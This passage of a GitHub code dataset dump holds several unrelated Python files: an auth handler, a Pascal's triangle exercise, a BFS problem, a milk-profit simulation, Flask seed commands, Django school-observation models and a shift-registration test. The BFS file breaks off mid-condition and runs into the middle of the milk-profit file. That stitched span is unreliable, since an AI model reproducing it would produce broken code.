if result['used']:\n self.error(code=403, message=\"Invite Code Already Used\")\n yield self.db.run_query(query.update({\"used\": True}))\n now = r.now()\n user = {\n \"email\": invite['email'],\n \"createdAt\": now,\n \"modifiedAt\": now\n }\n query = self.db.users.insert(user)\n result = yield self.db.run_query(query)\n key = result['generated_keys'][0]\n response = {\n \"key\": key\n }\n self.respond(response, code=201)","repo_name":"Deiru2k/Lightning","sub_path":"handlers/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"16181839110","text":"\"\"\"\nProblem Statement\nFind and return the nth row of Pascal's triangle in the form a list.\n n is 0-based.\n\nFor exmaple, if n = 4, then output = [1, 4, 6, 4, 1].\n\nTo know more about Pascal's triangle:\n https://www.mathsisfun.com/pascals-triangle.html\n\n\"\"\"\n\n\n# Solution\n\n'''\nPoints to note:\n1. We have to return a list.\n2. The elements of n^th row are made up of elements of (n-1)^th row.\n This comes up till the 1^st row. We will follow a top-down approach.\n3. Except for the first and last element, any other element at position `j`\n in the current row is the sum of elements at position `j`\n and `j-1` in the previous row.\n4. 
Be careful about the edge cases,\n example, an index should never be a NEGATIVE at any point of time.\n'''\n\n\ndef nth_row_pascal(n):\n if n == 0:\n return [1]\n\n # First row\n current_row = [1]\n\n ''' Loop from 1 to n; `i` denotes the row number'''\n for i in range(1, n + 1):\n # Set the `current_row` from previous iteration as the `previous_row`\n previous_row = current_row\n\n # Let's build the fresh current_row gradually\n # add the default first element at the 0^th index of the `i^th` row\n current_row = [1]\n\n '''\n Loop from 1 to (i-1);\n `j` denotes the index of an element with in the `i^th` row\n '''\n # Example, for 5th row we have considered n=4,\n # we will iterate index from 1 to 3, because\n # the default element at the 0^th index has already been added\n for j in range(1, i):\n\n # An element at position `j` in the current row is the\n # sum of elements at position `j` and `j-1` in the previous row.\n next_number = previous_row[j] + previous_row[j - 1]\n\n # Append the new element to the current_row\n current_row.append(next_number)\n\n # append the default last element\n current_row.append(1)\n return current_row\n\n\ndef test_function(test_case):\n n = test_case[0]\n solution = test_case[1]\n output = nth_row_pascal(n)\n if solution == output:\n print(\"Pass\")\n else:\n print(\"Fail\")\n\n\nn = 0\nsolution = [1]\ntest_case = [n, solution]\ntest_function(test_case)\n\nn = 1\nsolution = [1, 1]\ntest_case = [n, solution]\ntest_function(test_case)\n\nn = 2\nsolution = [1, 2, 1]\ntest_case = [n, solution]\ntest_function(test_case)\n\nn = 3\nsolution = [1, 3, 3, 1]\ntest_case = [n, solution]\ntest_function(test_case)\n\nn = 4\nsolution = [1, 4, 6, 4, 1]\ntest_case = [n, solution]\ntest_function(test_case)\n","repo_name":"thehimel/data-structures-and-algorithms-udacity","sub_path":"m02c01-arrays-linked-lists/i16e00_pascal's_triangle.py","file_name":"i16e00_pascal's_triangle.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"62"} +{"seq_id":"73520362116","text":"import sys\nfrom collections import deque\ninput = sys.stdin.readline\n\n\n\n\nif __name__==\"__main__\":\n n, k = map(int, input().split())\n graph=[list(map(int, input().split())) for _ in range(n)]\n s, x, y = map(int, input().split())\n queue=deque()\n\n\n for idx_k in range(1, k+1):\n for i in range(n):\n for j in range(n):\n if graph[i][j]==idx_k:\n queue.append([i,j,0])\n \n while queue:\n i, j, t= queue.popleft()\n\n if t==s:\n break\n\n dx=[0,1,0,-1]\n dy=[1,0,-1,0]\n\n for idx in range(4):\n nx = i+dx[idx]\n ny = j+dy[idx]\n\n if 0<=nx=stock):\r\n profit.append(6*stock)\r\n else:\r\n profit.append(x*6-2*(stock-x))\r\n averageProfit=sum(profit)/len(profit)\r\n return averageProfit\r\n\r\na=[]\r\nfname=open(\"milk.txt\")\r\nfline=fname.readline()\r\nwhile (fline):\r\n a.append(int(fline))\r\n fline=fname.readline()\r\n \r\nprint (\"Mean of demand=\",np.mean(a))\r\nprint (\"Standard deviation of demand=\",np.std(a))\r\nplt.plot(a)\r\nplt.show()\r\nplt.hist(a)\r\nplt.xlabel(\"Demand\")\r\nplt.ylabel(\"Frequency\")\r\nplt.show()\r\n\r\nstock=int(input(\"Enter the value of stock you want to keep:\"))\r\nprint(\"Profit Earned=\",profitfun(stock,a))\r\n\r\nxdemand=[]\r\nxprofit=[]\r\nfor i in [500,600,700,800,900,1000,1100,1200,1300,1400,1500]:\r\n xdemand.append(i)\r\n 
xprofit.append(profitfun(i,a))\r\nplt.plot(xdemand,xprofit)\r\nplt.xlabel(\"quantity\")\r\nplt.ylabel(\"profit\")\r\nindexoptimum=xprofit.index(max(xprofit))\r\noptimumStocks=xdemand[indexoptimum]\r\nprint(\"Stocks for maximum profit=\"+str(optimumStocks))\r\nplt.show()\r\n ","repo_name":"svmldon/IE_507_Modelling_lab","sub_path":"LAB 06/lab06ex1 submitted.py","file_name":"lab06ex1 submitted.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"21811874702","text":"from flask.cli import AppGroup\nfrom .users import seed_users, undo_users\nfrom .spots import seed_spots,undo_spots\nfrom .images import seed_images,undo_images\nfrom .reviews import seed_reviews, undo_reviews\nfrom .hosts import seed_hosts,undo_hosts\nfrom .amenities import seed_amenities, undo_amenities\nfrom .bookings import seed_bookings, undo_bookings\nfrom .favorites import seed_favorites, undo_favorites\n\n# Creates a seed group to hold our commands\n# So we can type `flask seed --help`\nseed_commands = AppGroup('seed')\n\n\n# Creates the `flask seed all` command\nfrom app.models.db import db, environment, SCHEMA\n\n@seed_commands.command('all')\ndef seed():\n if environment == 'production':\n # Before seeding, truncate all tables prefixed with schema name\n db.session.execute(f\"TRUNCATE table {SCHEMA}.users RESTART IDENTITY CASCADE;\")\n db.session.execute(f\"TRUNCATE table {SCHEMA}.hosts RESTART IDENTITY CASCADE;\")\n db.session.execute(f\"TRUNCATE table {SCHEMA}.spots RESTART IDENTITY CASCADE;\")\n db.session.execute(f\"TRUNCATE table {SCHEMA}.images RESTART IDENTITY CASCADE;\")\n db.session.execute(f\"TRUNCATE table {SCHEMA}.reviews RESTART IDENTITY CASCADE;\")\n db.session.execute(f\"TRUNCATE table {SCHEMA}.amenities RESTART IDENTITY CASCADE;\")\n db.session.execute(f\"TRUNCATE table {SCHEMA}.bookings RESTART IDENTITY CASCADE;\")\n db.session.execute(f\"TRUNCATE table {SCHEMA}.favorites RESTART IDENTITY CASCADE;\")\n # Add a truncate command here for every table that will be seeded.\n db.session.commit()\n seed_users()\n seed_hosts()\n seed_spots()\n seed_images()\n seed_reviews()\n seed_amenities()\n seed_bookings()\n seed_favorites()\n # Add other seed functions here\n\n\n# Creates the `flask seed undo` command\n@seed_commands.command('undo')\ndef undo():\n undo_users()\n undo_hosts()\n undo_spots()\n undo_images()\n undo_reviews()\n undo_amenities()\n undo_bookings()\n undo_favorites()\n # Add other undo functions here\n","repo_name":"vernfongchao/Stay-The-Night","sub_path":"app/seeds/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"41976504747","text":"# File: models.py\n\nfrom django.core.exceptions import ValidationError\nfrom django.core.validators import MaxValueValidator, MinLengthValidator, MinValueValidator\nfrom django.db import models\nfrom django.db.models.constraints import UniqueConstraint\nfrom django.db.models.fields.related import ForeignKey, ManyToManyField\nfrom django.db.models.fields import AutoField, BooleanField, CharField, DateField, DateTimeField, IntegerField, TextField, URLField\nfrom django.db.models.functions import Random # For use in Fokusgruppe.rand_rank\nfrom django.urls import reverse\nfrom django.utils.translation import gettext_lazy as _\n\nimport uuid\n\n\nclass Skole(models.Model):\n \"\"\"Samle-struktur (klasse) for klasser. 
En lærer vil være tilknyttet (mindst 1) skole.\"\"\"\n\n # Fields\n navn = models.CharField(max_length=100, help_text='Skolens officielle navn')\n kortnavn = models.CharField(max_length=20, help_text='Skolens korte navn')\n oprettet = models.DateTimeField(\n # auto_now_add=True VISER feltet i http://127.1:8000/admin/prepare/skole/\n #\n #default=datetime.now() # \n auto_now_add=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now_add\n )\n opdateret = models.DateTimeField( # NB: Dato opdateres ved Model.save() ikke ved QuerySet.update(), se dokumenation!\n # auto_now=True SKJULER feltet i http://127.1:8000/admin/prepare/skole/, =False VISER feltet.\n #\n #default=datetime.now()#,\n auto_now=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now\n )\n\n # Metadata\n class Meta:\n ordering = ['navn']\n verbose_name_plural = 'skoler'\n\n # Methods\n def get_absolute_url(self):\n \"\"\"Returnerer URL, der tilgår en bestemt instantiering af klassen Skole (en bestemt skole).\"\"\"\n return reverse('skole-detalje-visning', args=[str(self.id)])\n\n def __str__(self):\n \"\"\"Streng, som repræsenterer Skole-objektet (på Admin siden etc.).\"\"\"\n return f\"{self.kortnavn}: {self.navn}\"\n\n\nclass Klasse(models.Model):\n \"\"\"\n Skoleklasser, undervisningsgruppe eller hold. \n Samler Elev-objekter.\n En lærer vil være tilknyttet (ingen eller flere) hold.\n \"\"\"\n\n # Fields\n navn = models.CharField(max_length=100, help_text='Holdets administrative navn')\n kortnavn = models.CharField(max_length=20, help_text='Holdets korte navn')\n oprettet = models.DateTimeField(\n #default=datetime.now() # \n auto_now_add=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now_add\n )\n opdateret = models.DateTimeField( # NB: Dato odateres ved Model.save() ikke ved QuerySet.update(), se dokumenation!\n #default=datetime.now(), #\n auto_now=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now\n )\n skole = models.ForeignKey('Skole', on_delete=models.RESTRICT, null=True)\n startår = models.IntegerField(\n validators=[ MinValueValidator(1950), MaxValueValidator(2050)],\n help_text='Firecifret årstal for holdstart'\n )\n studieretning = CharField(\n max_length=3,\n choices=[\n ('stx', 'STX'),\n ('hf', 'HF'),\n ('htx', 'HTX'),\n ('hhx', 'HHX'),\n ('eux', 'EUX'),\n ('eud', 'EUD'),\n ('etc', 'Andet')\n ], \n default='stx', \n help_text='Klassens studieretning'\n )\n \"\"\"Fortløbende nummerering af den runde/omgang af samplinger, https://trello.com/c/mDSvj2t2 , klassens elever sættes sammen i, i fokusgrupper \"\"\"\n fokus_runde = models.IntegerField(\n validators=[ MinValueValidator(1), MaxValueValidator(999)],\n help_text='(automatisk) løbenummer for samplingsrunde til fokusgruppe'\n )\n \"\"\"Antal medlemmer i fokusgruppe\"\"\"\n fokus_antal = models.IntegerField(\n validators=[ MinValueValidator(1), MaxValueValidator(35)], \n default=5,\n help_text='Standardstørrelse af klassens fokusgruppe'\n )\n note = models.TextField(\n max_length=200, \n blank=True,\n null=True,\n help_text='Lærerens generelle noter om holdet, dets lokale eller historik'\n )\n\n # Metadata\n class Meta:\n ordering = ['navn']\n verbose_name = 'klasse'\n verbose_name_plural = 'klasser'\n\n # Methods\n def get_absolute_url(self):\n \"\"\"Returnerer URL, der tilgår en bestemt instantiering af klassen Klasse (et bestemt hold).\"\"\"\n return 
reverse('hold-detalje-visning', args=[str(self.id)])\n\n def __str__(self):\n \"\"\"Streng, som repræsenterer Klasse-objektet (på Admin siden etc.).\"\"\"\n return f\"{self.kortnavn} ({self.skole.kortnavn}): {self.navn}.\"\n\n\nclass Elev(models.Model):\n \"\"\"\n Underviste personer. En lærer vil være tilknyttet (ingen eller flere) hold.\n Portrætbillede (foto) evt. i separat tabel/Model.\n \"\"\"\n\n # Fields\n id = models.UUIDField( # https://stackoverflow.com/a/34264443/888033\n primary_key=True, \n default=uuid.uuid4, \n editable=False\n )\n oprettet = models.DateTimeField(\n auto_now_add=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now_add\n )\n opdateret = models.DateTimeField( # NB: Dato odateres ved Model.save() ikke ved QuerySet.update(), se dokumenation!\n auto_now=True,\n )\n fornavn = models.CharField(\n max_length=50, \n validators=[MinLengthValidator(2)],\n help_text='Personens officielle fornavn(e) som i protokol'\n )\n efternavn = models.CharField(\n max_length=50, \n validators=[MinLengthValidator(2)],\n help_text='Personens officielle efternavn(e) som i protokol'\n )\n kaldenavn = models.CharField(\n max_length=15, \n null=True,\n blank=True,\n help_text='Det navn, personen ønsker brugt i daglig tiltale'\n )\n klasse = models.ForeignKey('Klasse', on_delete=models.RESTRICT, null=True)\n unilogin = models.CharField(\n max_length=8, \n validators=[MinLengthValidator(8)],\n help_text='Personens officielle fornavn(e) som i protokol'\n )\n indmeldt = models.DateField(\n blank=True,\n null=True,\n help_text='Dato for hvornår eleven begynder at gå i klassen'\n )\n udmeldt = models.DateField(\n blank=True,\n null=True,\n help_text='Dato for hvornår eleven er holdt op med at gå i klassen'\n )\n mail = models.EmailField(help_text='Mail, læreren kan bruge til kommunikation med eleven')\n # https://stackoverflow.com/q/19130942/888033\n mobil = models.CharField(\n max_length=15, \n validators=[MinLengthValidator(8)],\n help_text='Mobiltelefonnummer, system og lærer kan bruge til kommunikation med eleven'\n )\n note = models.TextField(\n max_length=200, \n null=True,\n blank=True,\n help_text='Lærerens noter om eleven, elevens lokale eller historik. OBS der er mulighed andetsteds for løbende observationsnoter.'\n )\n\n class Meta:\n ordering = ['klasse', 'fornavn', 'efternavn']\n verbose_name_plural = 'elever'\n\n # Methods\n def get_absolute_url(self):\n \"\"\"Returnerer URL, der tilgår en bestemt instantiering af klassen Klasse (et bestemt hold).\"\"\"\n return reverse('elev_detaljer', args=[str(self.id)])\n\n def __str__(self):\n \"\"\"Streng, som repræsenterer Elev (på Admin siden etc.).\"\"\"\n return f\"{self.fornavn} {self.efternavn} ({self.klasse.kortnavn})\"\n\n\nclass FokusGruppe(models.Model):\n \"\"\"\n Randomiseret liste over Elever. Gentagelser af samme Elev vil forekomme i længere forløb.\n En hel Klasse tilføjes ad gangen. \n Rækkefølgen af Elever i Klassen skifter for hver `klasse.fokus_runde`, og bestemmes af `self.rand_rank`.\n Læreren tildeler sig til hvert Modul (hver \"time\") et antal elever fra klassen. 
Læreren giver hver elev i denne gruppe Adfærdsobservation.\n Reificerer relation mellem Elev og Modul.\n\n Sammenlagt FokusGruppe og Adfærd 1/8 2021\n \"\"\"\n # Fields\n #elev_fg_runde_id = AutoField(primary_key=True, verbose_name='Fokusgruppens Elev-løbenummer')\n id = AutoField(primary_key=True, verbose_name='Fokusgruppe-kandidatens elev+modul-løbenummer')\n \"\"\"Klasse (og dermed `Elev.Klasse.fokus_runde`), samt Elev gives af denne relation.\"\"\"\n elev = models.ForeignKey('Elev', on_delete=models.RESTRICT, null=True)\n oprettet = models.DateTimeField(\n #default=timezone.now() \n auto_now_add=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now_add\n )\n opdateret = models.DateTimeField( # NB: Dato odateres ved Model.save() ikke ved QuerySet.update(), se dokumenation!\n #default=timezone.now(), \n auto_now=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now\n )\n \"\"\"\n Modul udfyldes ikke ved generering af del-liste, \n først når læreren udvælger hvor mange, der skal observeres i det pågældende Modul.\n Dato (og tid) gives af denne relation.\n \"\"\"\n \"\"\"\n Modul giver Forløb og knytter Elev til modulets fokusgruppe, når tildelt.\n Eleven i en instantiering (række) præsenteres i liste over Fokusgruppe-kandidater,\n hvis bedømt=False eller =Null. Sættes til =True, når observation registreres.\n \"\"\"\n modul = models.ForeignKey(\n 'Modul', \n models.SET_NULL,\n blank=True, \n null=True, \n )\n\n #@property eller overflødig?\n bedømt = models.BooleanField(null=True, default='')\n\n \"\"\"True, hvis Elev var til stede i Modul? Null indtil Elev er bedømt\"\"\"\n tilstede = BooleanField(null=True, default='')\n \n \"\"\"\n Tilfældig værdi mellem 0 og 1, der tildeles ved oprettelse.\n Sorteringsværdi (indenfor Elev.Klasse.fokus_runde). \n \"\"\"\n rand_rank = models.FloatField(\n validators=[MinValueValidator(0.0), MaxValueValidator(1.0)],\n # https://docs.djangoproject.com/en/3.2/ref/models/database-functions/#random\n # maybe also: https://realpython.com/python-random/\n default=Random(), # Introduced in Django 3.2\n editable=False,\n null=False\n )\n \"\"\"\n De to sociale performance indicators er intenderet til at stimulere/måle elevernes 'Decency Quotient'. 
\n Den faglige er til at stimulere/måle 'Intelligenskvitient'.\n Scores kan alene registreres (not Null), hvis `tilstede`=True (observation ikke mulig af fraværende elever).\n \"\"\"\n def get_max_score():\n return 4\n spørg = IntegerField(blank=True, null=True, validators=[MinValueValidator(1), MaxValueValidator(get_max_score())], help_text='Score for elevens evne til at søge hjælp på fagligt spørgsmål')\n hjælp = IntegerField(blank=True, null=True, validators=[MinValueValidator(1), MaxValueValidator(4)], help_text='Score for elevens evne til at yde hjælp til faglig problemløsning')\n faglig = IntegerField(blank=True, null=True, validators=[MinValueValidator(1), MaxValueValidator(4)], help_text='Score for elevens evne til at bidrage til en faglig samtale')\n stikord = CharField( blank=True, null=True, max_length=30, help_text='Lærerens observationer i \"tre\" ord')\n reaktion = CharField( blank=True, null=True, max_length=30, help_text='Elevens bemærkning')\n\n class Meta:\n ordering = ['id', 'elev']\n verbose_name = 'fokusgruppe til adfærdsobservation'\n verbose_name_plural = 'fokusgrupper til adfærdsobservation'\n # Suggested by @bdbd https://stackoverflow.com/q/68872046/888033\n # https://docs.djangoproject.com/en/3.2/ref/models/constraints/#uniqueconstraint\n constraints = [UniqueConstraint(fields=['elev', 'modul'], name='unik_modul_elev')]\n \n # Methods\n \"\"\"Giver 'baglæns' URL-kodning mening for denne Model?\"\"\"\n def get_absolute_url(self):\n \"\"\"Returnerer URL, der tilgår en bestemt instantiering af klassen Klasse (et bestemt hold).\"\"\"\n return reverse('fokusgruppe', args=[str(self.id)])\n\n def __str__(self):\n \"\"\"Streng, som repræsenterer Elev (på Admin siden etc.).\"\"\"\n tmp_forløb = tmp_modul = '-'\n if self.modul:\n tmp_forløb = self.modul.forløb.titel\n if self.modul.afholdt:\n tmp_modul = self.modul.afholdt\n else:\n tmp_modul = 'NA'\n self.modul.forløb.titel\n return f\"{self.elev.fornavn} {self.elev.efternavn}, d. 
{tmp_modul} om '{tmp_forløb}' (runde {self.klasse.fokus_runde} i {self.klasse.kortnavn})\"\n else:\n tmp_forløb = 'Ukendt'\n return f\"{self.elev.fornavn} {self.elev.efternavn} ikke tildelt (runde {self.klasse.fokus_runde} i {self.klasse.kortnavn})\"\n \n @property # Getter method - avoiding reduncant data entry\n # Frit efter https://www.geeksforgeeks.org/python-property-decorator-property/\n def runde(self):\n \"\"\"Runde af observation, fra Elev.Klasse.fokus_runde (redundant).\"\"\"\n return self.elev.klasse.fokus_runde\n @property\n def klasse(self):\n return self.elev.klasse\n \n #def clean(self,modul):\n \"\"\"\n https://docs.djangoproject.com/en/3.2/ref/models/instances/#django.db.models.Model.clean\n \"\"\"\n # if( modul.forløb.klasse == self.klasse ):\n # if FokusGruppe.elev in [fg.elev for fg in FokusGruppe.objects.filter(modul=FokusGruppe.modul)]:\n # self.modul = modul\n # else:\n # raise( ValidationError(_(f'Modul {modul} har allerede fået tildelt Elev \"{self.elev}\".')) )\n # else:\n # raise( ValidationError(_('Klasse angivet af modul (gennem forløb) stemmer ikke med klasse angivet af elev.')) )\n\nclass Emne(models.Model):\n \"\"\"Faglige emner, som danner rammen om forløb for de enkelte klasser\"\"\"\n id = AutoField(primary_key=True, verbose_name='Emne-løbenummer (automatisk)')\n titel = CharField(max_length=20, help_text='Betegnelse for emnet')\n oprettet = models.DateTimeField(\n #default=timezone.now() \n auto_now_add=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now_add\n )\n opdateret = models.DateTimeField( # NB: Dato odateres ved Model.save() ikke ved QuerySet.update(), se dokumenation!\n #default=timezone.now(), #\n auto_now=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now\n )\n fag = CharField( # Eller ForeignKey til (ikke oprettet) Model: Fag.\n max_length=3,\n choices=[\n ('mat', 'Matematik'), \n ('it', 'Informationsteknologi')\n ], \n default='Matematik'\n )\n studieretning = CharField(\n max_length=3,\n choices=[\n ('stx', 'STX'),\n ('hf', 'HF'),\n ('htx', 'HTX'),\n ('hhx', 'HHX'),\n ('eux', 'EUX'),\n ('eud', 'EUD'),\n ('etc', 'Andet')\n ], \n default='stx', \n help_text='Klassens studieretning'\n )\n faglige_mål = TextField(max_length=1000, help_text='Bekendtgørelsens og skolens faggruppes krav til emnet')\n note = TextField(\n max_length=1000, \n null=True,\n blank=True,\n help_text='Lærerens krav til og ambitioner for emnet'\n )\n klassetrin = IntegerField(\n validators=[MinValueValidator(1), MaxValueValidator(4)],\n help_text='Årgang, emnet undervises på (siden holdets startår)',\n )\n varighed = IntegerField(help_text='Forventet antal lektioner/moduler')\n\n class Meta:\n ordering = ['fag', 'studieretning', 'klassetrin', 'titel']\n verbose_name_plural = 'emner'\n \n def __str__(self):\n return f\"{self.fag}-{self.studieretning}/{self.klassetrin}: {self.titel}. 
\"\n\n def get_absolute_url(self):\n \"\"\"Returnerer URL, der tilgår en bestemt instantiering af Emne.\"\"\"\n return reverse('emne-detalje-visning', args=[str(self.id)])\n\n\nclass Forløb(models.Model):\n \"\"\"Forløb er et Emne, der gennemgås i en Klasse fra et bestemt tidspunkt (`påbegyndt`) og som har en planlagt `varighed`.\"\"\"\n id = AutoField(primary_key=True, verbose_name='Forløbs-løbenummer (automatisk)')\n emne = ForeignKey('Emne', on_delete=models.RESTRICT, null=True)\n klasse = ForeignKey('Klasse', on_delete=models.RESTRICT, null=True)\n oprettet = models.DateTimeField(\n #default=timezone.now() \n auto_now_add=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now_add\n )\n opdateret = models.DateTimeField( # NB: Dato odateres ved Model.save() ikke ved QuerySet.update(), se dokumenation!\n #default=timezone.now(), \n auto_now=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now\n )\n titel = CharField(max_length=20, help_text='Overskrift for forløbet')\n påbegyndt = DateField(help_text='Dato for planlagt start af forløbet')\n varighed = IntegerField(help_text='Forventet antal lektioner/moduler')\n kommentar = TextField(\n max_length=500, \n null=True,\n blank=True,\n help_text='Præsentation til holdets elever af det konkrete forløb i klassen'\n )\n\n class Meta:\n ordering = ['klasse', 'emne']\n verbose_name_plural = 'forløb'\n\n def __str__(self):\n return f\"{self.klasse.kortnavn}: fra {self.påbegyndt} -- {self.emne}\"\n \n def get_absolute_url(self):\n \"\"\"Returnerer URL, der tilgår et bestemt Forløb.\"\"\"\n return reverse('forloeb-detalje-visning', args=[str(self.id)])\n\n\nclass Modul(models.Model):\n \"\"\"\n Modul er en 'time' eller lektion, der er/bliver `afholdt` på en bestemt dag som del af et Forløb.\n \"\"\"\n id = AutoField(primary_key=True,verbose_name='Modul-løbenummer (automatisk)')\n forløb = ForeignKey('Forløb', on_delete=models.RESTRICT, null=True)\n oprettet = models.DateTimeField(\n #default=timezone.now() \n auto_now_add=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now_add\n )\n opdateret = models.DateTimeField( # NB: Dato odateres ved Model.save() ikke ved QuerySet.update(), se dokumenation!\n #default=timezone.now(), \n auto_now=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now\n )\n afholdt = DateField(help_text='Planlagt / faktisk dato for modulet')\n \n class Meta:\n ordering = ['afholdt', 'id']\n verbose_name_plural='moduler'\n\n def __str__(self):\n return f\"Modul {self.id} '{self.forløb.titel}', {self.afholdt} ({self.forløb.klasse}).\"\n\n def get_absolute_url(self):\n \"\"\"Returnerer URL, der tilgår et bestemt Modul.\"\"\"\n return reverse('modul_tildel', args=[str(self.id)])\n\n\nclass Video(models.Model):\n \"\"\"\n Præsentation på video (eller i personligt fremmøde) af opgave stillet \n i forbindelse med et Forløb.\n https://trello.com/c/ZReTY2UN\n \"\"\"\n id = AutoField(primary_key=True,verbose_name='Løbenummer (automatisk) for videopræsentation')\n forløb = ForeignKey('Forløb', on_delete=models.RESTRICT, null=False)\n elev = ForeignKey('Elev', on_delete=models.RESTRICT, null=False)\n oprettet = models.DateTimeField(\n #default=timezone.now() \n auto_now_add=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now_add\n )\n opdateret = models.DateTimeField( # NB: Dato odateres ved Model.save() 
ikke ved QuerySet.update(), se dokumenation!\n #default=timezone.now(), \n auto_now=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now\n )\n \"\"\"\n Valideres til at ligge efter `forløb.påbegyndt` og før 3 måneder efter denne dato.\n Redundant, når `oprettet` haves?\n \"\"\"\n stillet =DateField(\n help_text='Dato, hvor opgaven blev stillet til elev (eller hold)'\n ) \n \"\"\"Afleveringsfrist Valideres til at ligge efter `stillet` og højst 3 måneder efter denne dato.\"\"\"\n frist = DateTimeField(help_text='Dato og tid for seneste aftalte aflevering')\n \"\"\"\n Gerne oprettelses-tidsstempel fra video-netside\n Valideres til at ligge efter `frist` og højst 3 måneder efter `frist`.\n \"\"\"\n indleveret = DateField(help_text='Dato og tid for faktisk aflevering') \n opgave = CharField(max_length=100, help_text='Opgavetekst for SOLO aktivitet')\n #\"\"\"\n # Knytter eventuelt opgaven, og dermed præsentationen,\n # til en HookED On Thinking aktivitet. \n # I bekræftende fald giver relationen et paradigmatisk - ikke opgave-konkret - \n # SOLO-retteark til SOLO-niveau.\n #\"\"\"\n # solo_aktivitet ManyToManyField\n url = URLField(help_text='Videoens placering (fx skjult på YouTube)')\n egen_solo = CharField(\n max_length=3,\n choices=[\n ('pre', 'Præstrukturelt niveau'), \n ('uni', 'Unistrukturelt niveau'), \n ('mul', 'Multistrukturelt niveau'), \n ('rel', 'Relationelt niveau'), \n ('udv', 'Udvidet-abstrakt niveau')\n ], \n null=True,\n verbose_name=\"Elevens egen bedømmelse efter SOLO\"\n )\n \"\"\"Hvis feltet udfyldes, sker det EFTER elevens egen SOLO bedømmelse.\"\"\"\n lærer_solo = CharField(\n max_length=3,\n choices=[\n ('pre', 'Præstrukturelt niveau'), \n ('uni', 'Unistrukturelt niveau'), \n ('mul', 'Multistrukturelt niveau'), \n ('rel', 'Relationelt niveau'), \n ('udv', 'Udvidet-abstrakt niveau')\n ], \n null=True\n )\n \"\"\" i stedet for (eller som supplement til) SOLO-bedømmelse \"\"\"\n egen_bedømmelse = CharField(\n max_length=100, null=True,\n verbose_name=\"Elevens egen bedømmelse i fri tekst\"\n )\n \"\"\"\n I stedet for (eller som supplement til) SOLO-bedømmelse. \n Hvis feltet udfyldes, sker det efter elevens egen bedømmelse.\n \"\"\"\n lærer_bedømmelse = CharField(\n max_length=100, null=True\n )\n \n class Meta:\n ordering = ['forløb', 'frist', 'elev']\n\n def __str__(self):\n return self.__class__.__name__ + f\" fra {self.elev} indleveret d. 
{self.indleveret}.\"\n\n def get_absolute_url(self):\n \"\"\"Returnerer URL, der tilgår en bestemt Video.\"\"\"\n return reverse('videopraesentation-detalje-visning', args=[str(self.id)])\n","repo_name":"engelsmann/bedom","sub_path":"prepare/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":22837,"program_lang":"python","lang":"da","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"12400175240","text":"import dxchange\nimport numpy as np\nimport deformcg as df\n\nif __name__ == \"__main__\":\n # Model parameters\n n = 128 # object size n x,y\n nz = 128 # object size in z\n ntheta = 1 # number of angles (rotations)\n ptheta = 1\n\n # Load object\n u0 = dxchange.read_tiff(\n 'data/delta-chip-128.tiff')[:, 64:64+ntheta].swapaxes(0, 1)\n\n shifts0 = np.random.random([ntheta, 2]).astype('float32')*10\n with df.SolverDeform(ntheta, nz, n, ptheta) as slv:\n u = slv.apply_shift_batch(u0, shifts0)\n shifts = slv.registration_shift_batch(u, u0, upsample_factor=10)\n print(shifts)\n rec = slv.apply_shift_batch(u, -shifts)\n print('error:', np.linalg.norm(rec-u0)/np.linalg.norm(u0))\n dxchange.write_tiff(\n u0[ntheta//2], 'resshift/delta-chip-128.tiff', overwrite=True)\n dxchange.write_tiff(\n u[ntheta//2], 'resshift/shiftdelta-chip-128.tiff', overwrite=True)\n dxchange.write_tiff(\n rec[ntheta//2], 'resshift/recdefdelta-chip-128.tiff', overwrite=True)\n","repo_name":"nikitinvv/deformcg","sub_path":"tests/test_shifts.py","file_name":"test_shifts.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"36331262681","text":"# To use a consistent encoding\r\nfrom os import path\r\n\r\n# Always prefer setuptools over distutils\r\nfrom setuptools import setup, find_packages\r\n\r\nhere = path.abspath(path.dirname(__file__))\r\n\r\nsetup(\r\n name='romanizer',\r\n packages=find_packages(),\r\n install_requires=['requests', 'pyonmttok', 'python-Levenshtein'],\r\n data_files=[('romanizer', ['romanizer/dakshina_lexicon.json'])]\r\n)\r\n","repo_name":"abhik1505040/Bangla-transliterator","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"39866944952","text":"import logging\nimport time\nfrom datetime import datetime, MINYEAR, timezone\n\nfrom redis import Redis\n\nfrom settings import (\n app_config,\n elastic_config,\n logger_settings,\n 